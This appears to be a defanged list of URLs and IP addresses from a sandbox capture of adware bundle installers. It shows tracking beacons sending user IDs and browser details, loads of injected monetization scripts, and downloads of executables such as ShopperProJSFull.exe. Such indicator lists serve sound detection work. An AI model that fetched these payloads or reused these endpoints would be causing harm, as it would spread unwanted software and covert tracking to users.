    hxxp://online.goobzo.com/online/ka.aspx?CV=2.0.0.0&ProductID=12000&UserID=335e88be-0c5e-4ba6-851b-e652ba3e6ba3&Password=oCQOL84Q&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1401908127&SBPIDS=1&KA=1 212.143.22.214
    hxxp://cds.d5k9g9i8.hwcdn.net/omaha/DD1B4183-F36A-4489-9A68-4205A6801149/1/update.xml?rand=24808
    hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?rand=24808&event=7&agent_type=2&ibic=92F4CE5DE43B4200BD216411591F0444IE&bic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&campaign=000169
    hxxp://online.goobzo.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=335e88be-0c5e-4ba6-851b-e652ba3e6ba3&Password=oCQOL84Q&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1401908127&SBPIDS=1&KA=1 212.143.22.214
    hxxp://online.goobzo.com/online/RegisterAnon.aspx?ProductID=12000&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList= 212.143.22.214
    hxxp://online.goobzo.com/online/ka.aspx?CV=2.0.0.0&ProductID=12000&UserID=9714b281-04df-4f52-935d-f743d52795b5&Password=YcRnhe0a&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1401908128&SBPIDS=1&KA=1 212.143.22.214
    hxxp://online.goobzo.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=9714b281-04df-4f52-935d-f743d52795b5&Password=YcRnhe0a&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1401908128&SBPIDS=1&KA=1 212.143.22.214
    hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=48292&bic=4252D7B4B8E54E2E95F19018ADCF24D9IE&ibic=4252D7B4B8E54E2E95F19018ADCF24D9IE&verifier=06a66a2d5edd8e17cc634fade0ffd159&ver=1_34_05_12&installtime=1401908103&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000803&campaign=000803&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=55&bgver=1&pluginsver=50&curtime=1401908103&lifetime=0&rnd=8172
    hxxp://cds.d5k9g9i8.hwcdn.net/omaha/DD1B4183-F36A-4489-9A68-4205A6801149/1/ping.xml?rand=24814
    hxxp://stub.goobzo.com/p.ashx?e=M7A8vgjJHrgfJBuEXOGPjbZ3F1XQsKZI/WD6e6SZIIHGHw2h393u/eTpxIBq/UhPKSzD1VOa2AGkPX72S84aTx6mU6M3hmZBQyGMTBwAMH7Mt 6BEut5hpvg3usbvS7ywHfBD544WbbHYOwAGan1UMcxvcDbxUA2YCpHZc9ZUaGG59M18K8NMt QPs7ujQYmkOB3v7aTq0GBlvrxT745bEA33c rILBrjOUAZXKr2d7gQ7Es6z9h LVF1ZzZB6XhP/BMvlZxIn/4AefXGAWYAXHyuBkgmFdvCCdaMPqgielTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdvavnoSbOw/pQButm8nuV6z4FYIe0wOEBsZrH4OkX02V7GZX3kksWuoAkrAmhSSB5da 54.208.92.111
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/48292/manifest/1_34_05_12/ie6/manifest.xml?ver=55&rnd=3431
    hxxp://online.goobzo.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=335e88be-0c5e-4ba6-851b-e652ba3e6ba3&Password=oCQOL84Q&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&XMLVersion=0&UpdateReason=0&resver=1.0.0.8&VA_Aff=NONE&ElapsedTime=1401908130&SBPIDS=1 212.143.22.214
    hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=92F4CE5DE43B4200BD216411591F0444IE&app=35510&appver=278&verifier=cf88a6e798062720061920ae8ad681d4&srcid=000169&version_date=21-05-14&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&xpiver=0_94&crxver=0&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=8704&asw3=&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1401908096&procruntime=34&rnd=1401908130
    hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=7F1D95218D1E4CF487AAD4B2A3E48467IE&app=32850&appver=200&verifier=1121c510e5f38d154df47b19458d540e&srcid=000046&version_date=21-05-14&subid=0&zdata=0&xpiver=0_94&crxver=0&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179873281&asw=0&asw2=8704&asw3=&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1401908094&procruntime=36&rnd=1401908130
    hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=7F1D95218D1E4CF487AAD4B2A3E48467IE&app=32850&appver=200&verifier=1121c510e5f38d154df47b19458d540e&srcid=000046&version_date=21-05-14&installtime=1401908094&curtime=1401908094&lifetime=0&silent=1&procstarttime=1401908094&procruntime=36&rnd=1401908130
    hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=4&ibic=7F1D95218D1E4CF487AAD4B2A3E48467IE&verifier=1121c510e5f38d154df47b19458d540e&campaign=000046&app=32850&bhover=1_34_05_12&xpiver=0_94&crxver=0&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1401908094&iep=1&chp=na&ffp=na&browser=ie,de
    hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=92F4CE5DE43B4200BD216411591F0444IE&app=35510&appver=278&verifier=cf88a6e798062720061920ae8ad681d4&srcid=000169&version_date=21-05-14&installtime=1401908096&curtime=1401908096&lifetime=0&silent=1&procstarttime=1401908096&procruntime=35&rnd=1401908131
    hxxp://stub.goobzo.com/p.ashx?e=657cd9m3NQGqLfoC4OqV/GiwnTkmW6P97OXLse4BafSePFQUn2Ibrb6Gb8KFABTw0I GKFrrI062Zgsasucq3OoYmyje41WxTJe1GQ MRj50TBvNdroHSbLRD/MFmTIYRWGjyvG Kbs0adlvQBqn5Tryg7dNNcvK1QHs3X92ilEqjHjRwH0s7BD4NsK07Wi5s IILilpWF3L9qMA UL4GiYcYa rp/59Oz3yCtjoppOv9W41Hn7OPSVNckomstbKncplbj8o7GeNKEGtOzYkhvxvAD7aZuOdb/qkf695NeIuTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H1TdLx6y8urBOYreTUQCzqx8ug910iRjdYG20YNolFscpWGoJzV3Ivc 54.208.92.111
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/48292/js/na/ie/app_code.js?ver=61&rnd=9245
    hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/48292/plugins/na/ie/plugins.json?ver=56&rnd=2231
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/monetization/geo/intext_5_j_m.js?ver=1&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/monetization/geo/ciuvo_m.js?ver=5&rnd=41
    hxxp://stub.goobzo.com/p.ashx?e=A3ANzFv7fWAfJBuEXOGPjbZ3F1XQsKZI/WD6e6SZIIHGHw2h393u/eTpxIBq/UhPKSzD1VOa2AGkPX72S84aTx6mU6M3hmZBQyGMTBwAMH7Mt 6BEut5hpvg3usbvS7ywHfBD544WbbHYOwAGan1UMcxvcDbxUA2YCpHZc9ZUaEPdfaewClKTBMAGkRtqR4lkOB3v7aTq0HsOFy1JuuOGobmMLPdXjSPOJqg3CYPY8Eb1vqYY5dG9TQ G9t8UJTnBlO Jp7dmc5VAAKZHGiEvuADRTOEl9NdMAynrhmcDJLYh0TFSmgURPDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMYIaukc1i7BWldmt6Vgk8tSxrE XAiAXT7DPafqE8Ksx6iX54Mz7OSce7sFfJdDo8VbZqQgAoOW0c oG7kP3/9A= 54.208.92.111
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/monetization/monetizationLoader.js?ver=50&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/monetization/setup.js?ver=11&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/monetization/geo/superfish_no_coupons_m.js?ver=11&rnd=41
    hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=4&ibic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&campaign=000169&app=35510&bhover=1_34_05_12&xpiver=0_94&crxver=0&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1401908096&iep=1&chp=na&ffp=na&browser=ie,de
    hxxp://rep.shopper-pro.com/app/ping.ashx?e=WVbe3wHlwMFN39k7Xfv8ZYJy6t0jZcn/3Pumfblmu5B9EKWfiY9Pr/lWymhtcc3oSGExqW4qn7xbfNvkjTiX5MYfDaHf3e795OnEgGr9SE8pLMPVU5rYAaQ9fvZLzhpPHqZTozeGZkFDIYxMHAAwfsy37oES63mGl8axoeNMkn46SEXCM79iefveis23DNM6naQQuHaXH0P7e7Z5lK2CBt35bH/eTc70z3EdWN1pnr gmTUgTv 1htN1EBSRfGX1ciiAZ/vb5amGSD/1t3LtazSyzm0szDxlLkxhdnC/RJrb4ZR 6izXtqnDUZD3eCjLyi7SKmc/IBy8ymb4qgtISeTiTeDBaDsYF8DSQNk3h1UhHWwrE8V1N8HrzshzK1L 3T6bhmIsCigFI5wSubXkxw0swgI0gHqEPyWxZkil7pIhSztea6z1Rw== 54.197.238.106
    hxxp://stub.goobzo.com/p.ashx?e=QHucCbLl /brPsk3N17xhK0c20onz6EKsg7jyZ2P5QEjfVNNb5zryg5l0yrLhC8IkMEePUdJICfsWidKRQX9FApRF Mcisr33MyQgDERGz/aRhOxjWineepdwHjwEZIe95UqEBNy sM2eOB64cY1CnicnG1q9KebRiAHnl3CJeyz8LjnD4BZNQQy9IgZy5lJKYX3Ti/i3YMWsa713zW45cEKmBJ1kytzHfGrmKb Ai8StAZytkA54Y0S1nWxf2ZUZB6PWEkv//ugKlGaFWGmKsEM9xpLdeKBEOit TkqGe pujWJYmVycY2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLN7ndzAAGpu/O 55wS hX7eXsuU5/1/Tz3wT9IEbQH33V9ctlp/PAg= 54.208.92.111
    hxxp://rep.shopper-pro.com/app/ping.ashx?e=37A8KpTgCn8 8U9Mk34kw2d IPgbweuc3RDD4M2MKnlkNeKJ xgctdGdqHePycrYlEzjD3RV2P zo7anpTgKuUuWYfM6izmf8Jo6a7hQsoV XTIrvDDxtNQemHjKoviJv6nUSaXbu5kh6O1xoOM2Wwr5wRTDRQspifHi86VNADDPCU8GQVxGgK2dgS8O/TaQhbdsE06OTTBOUDdMBQAxomYsAOzz7hm2v6mMnRFV9GhIj5Qq2ZmLjxaaNW52wnP0R2 KBcqjJpLQObBpEzucPnUWDi3cBRthwZ hsz0Po2FTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05PxWwjEc sn2M3eQ9XFbt1hwldgUs5GwsN3teEmMBnHkEwqUveKdtVhw945ujwMCrw90 8ZIB Duyzgolj5eZNKfv3I83DDLqkm2zLBWAsWL 54.197.238.106
    hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=update&app=48292&bic=4252D7B4B8E54E2E95F19018ADCF24D9IE&verifier=06a66a2d5edd8e17cc634fade0ffd159&ver=1_34_05_12&installtime=1401908103&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&appver=61&bgver=1&pluginsver=56&curtime=1401908134&lifetime=31&oldappver=55&oldbgver=1&oldpluginsver=50&rnd=55
    hxxp://online.goobzo.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=335e88be-0c5e-4ba6-851b-e652ba3e6ba3&Password=oCQOL84Q&OS=5&V=3.3.9.4&VS=1&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&XMLVersion=20131113143800&UpdateReason=0&resver=1.0.0.8&VA_Aff=NONE&XMLUpdateFailed=0&ElapsedTime=1401908134&SBPIDS=1 212.143.22.214
    hxxp://mag.goobzo.com/video_accelerator/wizardtest/SMALLTEST.HTM?random=242187&mode=nolsp
    hxxp://mag.goobzo.com/youtube_accelerator/wizardtest/SMALLTEST.HTM?random=244890&mode=nolsp
    hxxp://rep.shopper-pro.com/app/ping.ashx?e=XOxRKBm2zlz43cdm0TeNYqvOUIgADtTZ84gwwF9sRtJdOfUh X e3KWVb3f653Ub2yLvqUuoT2b669uXeODcaUuDZbxKNz6N3xwxIY7FNY4IxcYwieKyX4pPpNLnjc3vsjQeo7Y/37l2kFFoEOzkodWpMxhUIEuT EY/m9JM6zbR1Eo4r5ocnsO0XORzHjel Qi34DV81hm9ABjuVptn8v8ankP8n9dyrKt6FFFGjDmPwcSeTfjP3YwzWtA8HvLhQihwWd1cUa1yd89kh8bQbg K8GXcis4jv1zMzG4ks6u/xtWMdbqt0cTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn52bdmVIAGqWaTBxrOKcJrIKQk8wntVZkQfl0yK7ww8bTUHph4yqL4ib p1Eml27uZIejtcaDjNlsK cEUw0ULKbbG BFpnNiEsykr hf4aEw= 54.197.238.106
    hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_12&bic=4252D7B4B8E54E2E95F19018ADCF24D9IE&app=48292&appver=61&verifier=06a66a2d5edd8e17cc634fade0ffd159&srcid=000803&version_date=21-05-14&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&xpiver=0_94&crxver=1_26_55&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8397312&asw3=&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1401908103&procruntime=35&rnd=1401908138
    hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=4252D7B4B8E54E2E95F19018ADCF24D9IE&app=48292&appver=61&verifier=06a66a2d5edd8e17cc634fade0ffd159&srcid=000803&version_date=21-05-14&installtime=1401908103&curtime=1401908103&lifetime=0&silent=1&procstarttime=1401908103&procruntime=35&rnd=1401908138
    hxxp://js.clientstatsservice.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js?ver=11&rnd=41 69.16.175.10
    hxxp://js.clientstatsservice.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js?ver=12&rnd=41 69.16.175.10
    hxxp://js.clientstatsservice.com/plugin/apps/48292/plugins/na/ie/plugins.json?ver=56&rnd=2231 69.16.175.10
    hxxp://d2y2rdikhrisqr.cloudfront.net/iwebar2.exe 54.230.54.188
    hxxp://d26ccbexlraban.cloudfront.net/sense7.exe
    hxxp://logs.clientstatsservice.com/monetization.gif?event=3&ibic=7F1D95218D1E4CF487AAD4B2A3E48467IE&verifier=1121c510e5f38d154df47b19458d540e&campaign=000046&app=32850&bhover=1_34_05_12&xpiver=0_94&crxver=0&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1401908094&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&asw3=00000000000000000000000000000000&browser=ie,de 69.16.175.10
    hxxp://test.youtubeaccelerator.com/video_accelerator/wizardtest/SMALLTEST.HTM?random=242187&mode=nolsp
    hxxp://stats.clientstatsservice.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_12&bic=4252D7B4B8E54E2E95F19018ADCF24D9IE&app=48292&appver=0&verifier=06a66a2d5edd8e17cc634fade0ffd159&srcid=000803&version_date=21-05-14&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&xpiver=0_94&crxver=1_26_55&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8397312&asw3=&procstarttime=1401908103&procruntime=2&rnd=1401908105 54.231.2.244
    hxxp://logs.clientstatsservice.com/monetization.gif?ibic=4252D7B4B8E54E2E95F19018ADCF24D9IE&verifier=06a66a2d5edd8e17cc634fade0ffd159&campaign=000803&event=11&app=32850&pubdetected=false&procstarttime=1401908103 69.16.175.10
    hxxp://crl.thawte.com/ThawteTimestampingCA.crl
    hxxp://js.clientstatsservice.com/plugins/mins/monetization/geo/ciuvo_m.js?ver=5&rnd=41 69.16.175.10
    hxxp://stats.clientstatsservice.com/stats.gif?action=daily&app=35510&bic=92F4CE5DE43B4200BD216411591F0444IE&ibic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&ver=1_34_05_12&installtime=1401908096&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000169&campaign=000169&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=268&bgver=1&pluginsver=133&curtime=1401908096&lifetime=0&rnd=514 54.231.2.244
    hxxp://update.clientstatsservice.com/omaha/06F9C542-63CA-47A4-A81F-3B5E3594D3A6/1/ping.xml?rand=24785
    hxxp://js.clientstatsservice.com/plugins/mins/monetization/setup.js?ver=12&rnd=41 69.16.175.10
    hxxp://js.clientstatsservice.com/plugins/mins/monetization/geo/bpo_intext_m.js?ver=1&rnd=41 69.16.175.10
    hxxp://online.GOOBZO.com/online/ka.aspx?CV=2.0.0.0&ProductID=12000&UserID=335e88be-0c5e-4ba6-851b-e652ba3e6ba3&Password=oCQOL84Q&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1401908127&SBPIDS=1&KA=1
    hxxp://js.datademoserv.com/plugin/apps/35510/js/na/ie/app_code.js?ver=278&rnd=9347
    hxxp://stats.clientstatsservice.com/apps.gif?action=update&app=32850&bic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&ver=1_34_05_12&installtime=1401908094&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000046&subid=0&zdata=0&appver=200&bgver=1&pluginsver=164&curtime=1401908122&lifetime=28&oldappver=197&oldbgver=1&oldpluginsver=161&rnd=9805 54.231.2.244
    hxxp://d2bt1dcmxj05l2.cloudfront.net/ShopperProJSFull.exe
    hxxp://stats.clientstatsservice.com/stats.gif?action=daily&app=32850&bic=7F1D95218D1E4CF487AAD4B2A3E48467IE&ibic=7F1D95218D1E4CF487AAD4B2A3E48467IE&verifier=1121c510e5f38d154df47b19458d540e&ver=1_34_05_12&installtime=1401908094&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000046&campaign=000046&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=197&bgver=1&pluginsver=161&curtime=1401908094&lifetime=0&rnd=8734 54.231.2.244
    hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=XOxRKBm2zlz43cdm0TeNYqvOUIgADtTZ84gwwF9sRtJdOfUh X e3KWVb3f653Ub2yLvqUuoT2b669uXeODcaUuDZbxKNz6N3xwxIY7FNY4IxcYwieKyX4pPpNLnjc3vsjQeo7Y/37l2kFFoEOzkodWpMxhUIEuT EY/m9JM6zbR1Eo4r5ocnsO0XORzHjel Qi34DV81hm9ABjuVptn8v8ankP8n9dyrKt6FFFGjDmPwcSeTfjP3YwzWtA8HvLhQihwWd1cUa1yd89kh8bQbg K8GXcis4jv1zMzG4ks6u/xtWMdbqt0cTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn52bdmVIAGqWaTBxrOKcJrIKQk8wntVZkQfl0yK7ww8bTUHph4yqL4ib p1Eml27uZIejtcaDjNlsK cEUw0ULKbbG BFpnNiEsykr hf4aEw=
    hxxp://ts-crl.ws.symantec.com/tss-ca-g2.crl
    hxxp://js.clientstatsservice.com/plugin/apps/32850/manifest/1_34_05_12/ie6/manifest.xml?ver=197&rnd=7542 69.16.175.10
    hxxp://js.clientstatsservice.com/plugins/mins/monetization/setup.js?ver=11&rnd=41 69.16.175.10
    hxxp://stats.clientstatsservice.com/stats.gif?action=daily&app=48292&bic=4252D7B4B8E54E2E95F19018ADCF24D9IE&ibic=4252D7B4B8E54E2E95F19018ADCF24D9IE&verifier=06a66a2d5edd8e17cc634fade0ffd159&ver=1_34_05_12&installtime=1401908103&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000803&campaign=000803&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=55&bgver=1&pluginsver=50&curtime=1401908103&lifetime=0&rnd=8172 54.231.2.244
    hxxp://update.clientstatsservice.com/installer_updates/000169/update.json
    hxxp://stats.clientstatsservice.com/apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=92F4CE5DE43B4200BD216411591F0444IE&app=35510&appver=278&verifier=cf88a6e798062720061920ae8ad681d4&srcid=000169&version_date=21-05-14&installtime=1401908096&curtime=1401908096&lifetime=0&silent=1&procstarttime=1401908096&procruntime=35&rnd=1401908131 54.231.2.244
    hxxp://online.GOOBZO.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=335e88be-0c5e-4ba6-851b-e652ba3e6ba3&Password=oCQOL84Q&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&XMLVersion=0&UpdateReason=0&resver=1.0.0.8&VA_Aff=NONE&ElapsedTime=1401908130&SBPIDS=1
    hxxp://js.clientstatsservice.com/plugin/apps/32850/plugins/na/ie/plugins.json?ver=164&rnd=4320 69.16.175.10
    hxxp://online.GOOBZO.com/online/ka.aspx?CV=2.0.0.0&ProductID=12000&UserID=9714b281-04df-4f52-935d-f743d52795b5&Password=YcRnhe0a&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1401908128&SBPIDS=1&KA=1
    hxxp://st.goobzo.com/t.ashx?e=jJl6mEdycnQ 8U9Mk34kw1YtpnRz6OBdQF3UKsSdb2sOPTZ1h4Q6LUVho8rxvim7NGnZb0Aap XZAzLabjw6T2AqR2XPWVGhi24b6K/4pIUUAvnawhe3hcrFg62ocRzdxNB9hPvytbqj4mEVVTCsv8oowH443v5LVMzzGZXi fl6ZL2NeMWCfA==
    hxxp://update.clientstatsservice.com/omaha/DD1B4183-F36A-4489-9A68-4205A6801149/1/update.xml?rand=24808
    hxxp://stats.clientstatsservice.com/apps.gif?action=update&app=48292&bic=4252D7B4B8E54E2E95F19018ADCF24D9IE&verifier=06a66a2d5edd8e17cc634fade0ffd159&ver=1_34_05_12&installtime=1401908103&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&appver=61&bgver=1&pluginsver=56&curtime=1401908134&lifetime=31&oldappver=55&oldbgver=1&oldpluginsver=50&rnd=55 54.231.2.244
    hxxp://stats.clientstatsservice.com/apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=4252D7B4B8E54E2E95F19018ADCF24D9IE&app=48292&appver=61&verifier=06a66a2d5edd8e17cc634fade0ffd159&srcid=000803&version_date=21-05-14&installtime=1401908103&curtime=1401908103&lifetime=0&silent=1&procstarttime=1401908103&procruntime=35&rnd=1401908138 54.231.2.244
    hxxp://stats.clientstatsservice.com/apps.gif?action=install&browser=ie&browserver=6&ver=1_34_05_12&bic=7F1D95218D1E4CF487AAD4B2A3E48467IE&app=32850&appver=200&verifier=1121c510e5f38d154df47b19458d540e&srcid=000046&version_date=21-05-14&installtime=1401908094&curtime=1401908094&lifetime=0&silent=1&procstarttime=1401908094&procruntime=36&rnd=1401908130 54.231.2.244
    hxxp://logs.clientstatsservice.com/monetization.gif?rand=24808&event=7&agent_type=2&ibic=92F4CE5DE43B4200BD216411591F0444IE&bic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&campaign=000169 69.16.175.10
    hxxp://logs.clientstatsservice.com/monetization.gif?event=3&ibic=4252D7B4B8E54E2E95F19018ADCF24D9IE&verifier=06a66a2d5edd8e17cc634fade0ffd159&campaign=000803&app=48292&bhover=1_34_05_12&xpiver=0_94&crxver=1_26_55&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1401908103&asw=00000000000000000000000000000000&asw2=00000000100000000010001000000000&asw3=00000000000000000000000000000000&browser=ie,de 69.16.175.10
    hxxp://js.clientstatsservice.com/plugins/mins/stats/ie.js?ver=1&rnd=41 69.16.175.10
    hxxp://js.clientstatsservice.com/plugins/mins/monetization/geo/price_gong_m.js?ver=3&rnd=41 69.16.175.10
    hxxp://js.clientstatsservice.com/plugins/javascripts/monetization/geo/adextent_m.js?ver=1&rnd=41 69.16.175.10
    hxxp://stats.clientstatsservice.com/apps.gif?action=update&app=35510&bic=92F4CE5DE43B4200BD216411591F0444IE&verifier=cf88a6e798062720061920ae8ad681d4&ver=1_34_05_12&installtime=1401908096&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=000169&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJFNjR3bGlteXUxLDc0MjYxNDA5LWZiNTQtNDM2Yy1iNTk3LTFiMDllZjAzNTQwZCwiLCJ1bnEiOiI3NDI2MTQwOS1mYjU0LTQzNmMtYjU5Ny0xYjA5ZWYwMzU0MGQifX0=&appver=278&bgver=1&pluginsver=137&curtime=1401908122&lifetime=26&oldappver=268&oldbgver=1&oldpluginsver=133&rnd=7666 54.231.2.244
    hxxp://online.speedbit.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=335e88be-0c5e-4ba6-851b-e652ba3e6ba3&Password=oCQOL84Q&OS=5&V=3.3.9.4&VS=0&Beta=0&Aff=limyu1_0_0_0_0,74261409-fb54-436c-b597-1b09ef03540d,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1401908127&SBPIDS=1&KA=1
    hxxp://update.clientstatsservice.com/omaha/A411BEAA-C1B6-41C1-96DE-301C4C62F5AD/1/ping.xml?rand=24746
    hxxp://update.clientstatsservice.com/installer_updates/000803/update.json
    hxxp://js.clientstatsservice.com/plugin/apps/48292/js/na/ie/app_code.js?ver=61&rnd=9245 69.16.175.10
    hxxp://js.datademoserv.com/plugin/apps/35510/plugins/na/ie/plugins.json?ver=137&rnd=9679
    hxxp://js.clientstatsservice.com/plugin/apps/48292/manifest/1_34_05_12/ie6/manifest.xml?ver=55&rnd=3431 69.16.175.10
